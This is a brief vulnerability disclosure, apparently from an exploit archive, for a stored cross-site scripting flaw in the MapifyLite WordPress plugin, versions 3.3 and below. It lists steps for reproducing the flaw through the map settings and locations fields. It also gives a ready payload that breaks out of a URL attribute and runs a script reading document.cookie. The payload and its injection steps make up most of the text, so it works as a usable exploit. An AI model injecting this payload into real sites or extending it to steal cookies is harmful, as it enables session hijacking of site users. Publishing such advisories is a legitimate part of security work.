WordPress MapifyLite 3.3 Cross Site Scripting

WordPress MapifyLife plugin versions 3.3 and below suffer from a persistent cross site scripting vulnerability.


MD5 | 12998cba1b9d742b2679ff6fcef76da7

#Title : MapifyLite Wordpress Plugins Stored XSS Injection
#Date : 24/03/2021
#Author : Eagle Eye
#Vendor Homepage : https://mapifypro.com/product/mapifylite/
#Version Affected : 3.3 and below
#Tested on : Google Chrome
#XSS vulnerability from Map settings & locations

#1. Login user
#2. Go to add map settins/locations
#3. Put XSS payload at image pin url / image gallery url

#payload
http://localhost/"><script>alert(document.cookie)</script>

Related Posts